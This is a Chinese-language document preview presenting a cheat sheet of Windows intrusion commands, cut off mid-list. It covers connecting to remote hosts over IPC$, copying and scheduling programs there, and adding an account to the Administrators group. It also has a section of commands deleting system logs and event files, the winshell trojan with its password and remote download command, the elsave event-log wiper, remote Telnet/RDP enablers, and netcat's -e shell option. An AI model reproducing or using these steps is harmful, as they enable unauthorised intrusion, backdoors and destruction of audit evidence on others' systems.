网管和黑客都必须知道的命令.pdf
文本预览下载声明
管和黑客都必须知道的命令
常用的几条NET 命令:
==================================================
(与远程主机建立空管连接) net use \\IP 地址\ipc$ /use:
(以管理员身份登录远程主机) net use \\IP 地址\ipc$ 密码 /use:Administrator
(传送文件到远程主机WINNT 目录下)copy 本机目录路径\程序 \\IP 地址\admin$
(查看远程主机时间) net time \\IP 地址
(定时启动某个程序) at \\IP 地址 02:18 readme.exe
(查看共享) net view \\IP 地址
(查看netbios 工作组列表) nbtstat -A IP 地址
(将远程主机C 盘映射为自己的F 盘) net use f: \\IP 地址\c$ /user:Administrator
(这两条把自己增加到管理员组): net user 用户名 密码 /add
net localgroup Administrators 用户名 /add
(断开连接) net use \\IP 地址\ipc$ /delete
=====================================================
擦屁屁:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
============================
一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的 “时间任务”服务:
netsvc /list \\IP 地址
netsvc schedule \\IP 地址 /query
netsvc \\IP 地址 schedule /start
二、OpenTelnet.exe
远程启动主机的Telnet 服务,并 定端口到7878,例如:
OpenTelnet \\IP 地址 用户名 密码 1 7878
然后就可以telnet 到主机的7878 端口,进入DOS 方式下:
telnet IP 地址 7878
三、winshell.exe
一个非 小的木马 (不到6K ),telnet 到主机的7878 端口,输入密码winshell,当看到CMD后,可打下
面的命令:
p Path (查看winshell 主程序的路径信息)
b reBoot (重新启动机器)
d shutDown (关闭机器)
s Shell (执行后你就会看到可爱的“C:\ ”)
x eXit (退出本次登录会话,此命令并不终止winshell 的运行)
CMD http://.../srv.exe (通过http 下载其他网站上的文件到运行winshell 的机器上)
四、3389 登陆器,GUI 方式登录远程主机的
五、elsave.exe
事件日志清除工具
elsave -s \\IP 地址 -l application -C
elsave -s \\IP 地址 -l system -C
elsave -s \\IP 地址 -l security -C
执行后成功清除应用程序日志,系统日志,安全日志
六、hbulot.exe
开启win2kserver 和winxp 的3389 服务
hbulot [/r]
使用/r 表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处: nc [-options] hostname port[s] [ports] ...
定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危 !!]
-g gateway source-routing hop point[s], up to 8
-G num sour
显示全部